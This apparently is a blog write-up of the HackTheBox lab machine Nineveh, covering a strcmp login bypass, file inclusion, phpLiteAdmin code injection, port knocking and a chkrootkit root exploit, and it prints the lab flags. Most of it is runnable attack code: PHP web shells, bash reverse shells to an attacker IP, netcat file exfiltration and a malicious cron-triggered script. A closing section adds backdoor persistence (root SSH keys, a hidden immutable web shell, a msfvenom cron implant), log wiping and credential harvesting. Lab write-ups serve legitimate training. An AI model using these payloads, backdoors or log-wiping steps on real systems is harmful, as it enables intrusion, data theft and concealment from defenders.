Post

HackTheBox Nineveh

Writeup for HackTheBox Nineveh

HackTheBox Nineveh

Machine Synopsis

Key Exploitation Techniques:

  • PHP strcmp vulnerability for authentication bypass
  • Local File Inclusion (LFI) for arbitrary file read
  • phpLiteAdmin remote PHP code injection for RCE
  • Steganography (Binwalk) for hidden file extraction
  • Port knocking for hidden SSH service discovery
  • chkrootkit cronjob exploitation for privilege escalation

Reconnaissance & Enumeration

Port Discovery

1
2
3
4
5
6
7
$ nmap -sC -sV -A -p- 10.10.10.43
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
|_http-title: Site doesn't have a title (text/html).

Web Application Analysis

1
2
3
4
5
6
7
8
# Directory enumeration on HTTP
$ gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
/department             (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]

# Directory enumeration on HTTPS
$ gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k
/db                     (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/secure_notes           (Status: 301) [Size: 319] [--> https://10.10.10.43/secure_notes/]

department_webpage

department_notes

https_db

Key Findings:

  • HTTP: /department/ - Login portal
  • HTTPS: /db/ - phpLiteAdmin interface
  • HTTPS: /secure_notes/ - Static content with images

Exploitation

Department Portal Authentication Bypass

Username Enumeration

1
2
3
4
5
6
# Test different usernames
$ curl -X POST http://10.10.10.43/department/login.php -d "username=admin&password=test"
# Response: Invalid Password!

$ curl -X POST http://10.10.10.43/department/login.php -d "username=test&password=test"  
# Response: Invalid username

Finding: Username admin exists (different error message).

Password Brute Force

1
2
3
# Brute force admin password
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -s 80 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password" -t 64
[80][http-post-form] host: 10.10.10.43   login: admin    password: 1q2w3e4r5t

Alternative: PHP strcmp Bypass

alternative_department_login

1
2
3
# Exploit PHP strcmp vulnerability
$ curl -X POST http://10.10.10.43/department/login.php -d "username=admin&password[]="
# Bypasses authentication by making strcmp return NULL

Local File Inclusion Discovery

After login, the URL structure reveals potential LFI:

1
http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt

LFI Exploitation

1
2
3
4
5
6
7
# Test for LFI
$ curl -b "PHPSESSID=..." "http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../etc/passwd"

# Result: /etc/passwd contents displayed
root:x:0:0:root:/root:/bin/bash
...
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash

phpLiteAdmin Exploitation

Password Brute Force

db_attempt_login

1
2
3
# Brute force phpLiteAdmin password
$ hydra -l dummy -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -s 443 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64
[443][https-post-form] host: 10.10.10.43   login: dummy    password: password123

phpliteadmin_login

Code Injection via Database Creation

Based on phpLiteAdmin RCE (ExploitDB 24044):

  1. Create malicious database:
1
2
-- Database name: shell.php
-- This creates a file that can be executed as PHP
  1. Create table with PHP payload:
1
2
CREATE TABLE "shell" ("code" TEXT);
INSERT INTO "shell" ("code") VALUES ("<?php echo system($_REQUEST['cmd']); ?>");
  1. Access via LFI:
1
2
# Combine LFI with code injection
$ curl -b "PHPSESSID=..." "http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/shell.php&cmd=whoami"

upload_php_code

view_db

Reverse Shell Establishment

execute_php_code

1
2
3
4
5
6
7
8
9
# Setup netcat listener
$ nc -nlvp 1234

# Execute reverse shell via LFI + code injection
$ curl -b "PHPSESSID=..." "http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/shell.php&cmd=bash -c 'exec bash -i %26>/dev/tcp/10.10.14.29/1234 <%261'"
# Reverse shell received
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.43] 57400
www-data@nineveh:/var/www/html/department$ whoami
www-data

Privilege Escalation

Method 1: Port Knocking & SSH Key Discovery

Steganography Analysis

1
2
3
4
5
6
7
8
9
# Extract files from secure_notes
www-data@nineveh:/var/www/ssl/secure_notes$ ls
index.html  nineveh.png

# Exfiltrate nineveh.png
www-data@nineveh:/var/www/ssl/secure_notes$ nc 10.10.14.29 9999 < nineveh.png

# On attacker machine
$ nc -nlvp 9999 > nineveh.png

Hidden File Extraction

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Use binwalk to extract hidden files
$ binwalk -e nineveh.png --run-as=root
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)

$ cd _nineveh.png.extracted/secret
$ ls
nineveh.priv  nineveh.pub

$ cat nineveh.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb

Discovery: SSH private key for user amrois

Port Knocking Discovery

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Check knockd configuration via LFI
www-data@nineveh:/var/www/ssl/secure_notes$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens160

[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

SSH Access via Port Knocking

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# Perform port knocking sequence
$ for i in 571 290 911; do nmap -Pn --max-retries 0 -p $i 10.10.10.43 && sleep 1; done

# Verify SSH port is open
$ nmap 10.10.10.43
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

# SSH access with extracted private key
$ chmod 600 nineveh.priv
$ ssh -i nineveh.priv amrois@10.10.10.43
amrois@nineveh:~$ whoami
amrois

Method 2: chkrootkit Cronjob Exploitation

Process Monitoring

1
2
3
4
5
# Transfer and run pspy for process monitoring
amrois@nineveh:/tmp$ wget 10.10.14.29/pspy32s
amrois@nineveh:/tmp$ chmod +x pspy32s
amrois@nineveh:/tmp$ ./pspy32s
2022/06/28 09:54:02 CMD: UID=0    PID=12775  | /bin/sh /usr/bin/chkrootkit

Discovery: chkrootkit runs as root via cronjob

Vulnerability Analysis

chkrootkit 0.49 is vulnerable to local privilege escalation (ExploitDB 33899):

  • Executes files named update in /tmp/ as root
  • No validation of file contents or permissions

Exploit Deployment

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# Create malicious update script
$ cat > update << 'EOF'
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/10.10.14.29/9999 <&1'
EOF

# Host malicious script
$ python3 -m http.server 80

# Download and deploy on target
amrois@nineveh:/tmp$ wget 10.10.14.29/update
amrois@nineveh:/tmp$ chmod +x update

# Setup root listener
$ nc -nlvp 9999

Root Shell Acquisition

1
2
3
4
5
6
7
8
# Wait for chkrootkit execution (typically every minute)
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.43] 50164
root@nineveh:~# whoami
root
root@nineveh:/home# cat /home/amrois/user.txt
5739ccb3a42b270d86e50c877513187c
root@nineveh:/home# cat /root/root.txt
be1e57843d1f3e03b88d890411bcd901

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

1
2
3
4
5
6
7
8
9
# Maintain SSH access as amrois
# mkdir -p /home/amrois/.ssh
# cp /tmp/extracted_keys/nineveh.priv /home/amrois/.ssh/id_rsa
# chmod 600 /home/amrois/.ssh/id_rsa

# Install backdoor SSH key for root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys

Web Shell Maintenance

1
2
3
4
5
6
7
8
9
10
11
# Create persistent web shell
# cat > /var/www/html/.system.php << 'EOF'
<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
EOF

# Hide from casual inspection
# chattr +i /var/www/html/.system.php

Cron Backdoor

1
2
3
4
5
6
7
# Create reverse shell payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.29 LPORT=4444 -f elf -o backdoor

# Install persistent backdoor
# wget 10.10.14.29/backdoor -O /usr/bin/.update-system
# chmod +x /usr/bin/.update-system
# echo "*/30 * * * * /usr/bin/.update-system" >> /etc/crontab

Defense Evasion

Log Cleanup

1
2
3
4
5
6
7
8
9
10
11
12
# Clear system logs
# > /var/log/auth.log
# > /var/log/syslog
# > /var/log/apache2/access.log
# > /var/log/apache2/error.log

# Clear knockd logs
# > /var/log/knockd.log

# Clear command histories
# > /root/.bash_history
# > /home/amrois/.bash_history

Artifact Cleanup

1
2
3
4
5
6
7
8
# Remove exploitation artifacts
# rm /tmp/update
# rm /var/tmp/shell.php
# rm /tmp/pspy32s

# Clear temporary files
# find /tmp -name "*.php" -delete
# find /var/tmp -name "*.php" -delete

Lateral Movement Preparation

Network Discovery

1
2
3
4
5
6
# Discover network topology
# ip route show
# ss -tlnp

# Scan for internal services
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done

Credential Harvesting

1
2
3
4
5
6
7
8
# Search for database credentials
# grep -r "password\|mysql" /var/www/ 2>/dev/null

# Extract shadow file
# cp /etc/shadow /tmp/shadow.backup

# Search for SSH keys
# find /home -name "id_*" -o -name "*.pem" 2>/dev/null

Service Enumeration

1
2
3
4
5
6
7
8
# List active services
# ss -tlnp

# Check for databases
# ps aux | grep -E "(mysql|postgres|mongo)"

# Examine web configurations
# cat /etc/apache2/sites-enabled/*

Alternative Exploitation Methods

Manual LFI Exploitation

1
2
3
4
5
6
# Read sensitive system files
$ curl -b "PHPSESSID=..." "http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../etc/shadow"
$ curl -b "PHPSESSID=..." "http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../root/.ssh/id_rsa"

# Log poisoning attempt
$ curl -b "PHPSESSID=..." "http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/log/apache2/access.log"

Alternative PHP Code Injection

1
2
3
4
# Direct PHP file creation
# In phpLiteAdmin, create database named: backdoor.php
# Insert PHP code: <?php if(isset($_GET['c'])) system($_GET['c']); ?>
# Access via: http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/backdoor.php&c=id

Alternative Privilege Escalation

LinPEAS Enumeration

1
2
3
4
# Transfer and run LinPEAS
amrois@nineveh:/tmp$ wget 10.10.14.29/linpeas.sh
amrois@nineveh:/tmp$ chmod +x linpeas.sh
amrois@nineveh:/tmp$ ./linpeas.sh

Kernel Exploitation

1
2
3
4
5
6
# Check kernel version
amrois@nineveh:/tmp$ uname -a
Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017

# Search for applicable exploits
$ searchsploit linux kernel 4.4 | grep -i privilege

SUID Binary Analysis

1
2
3
4
5
# Find SUID binaries
amrois@nineveh:/tmp$ find / -perm -4000 -type f 2>/dev/null

# Check for custom SUID binaries
amrois@nineveh:/tmp$ ls -la /usr/local/bin/

This post is licensed under CC BY 4.0 by the author.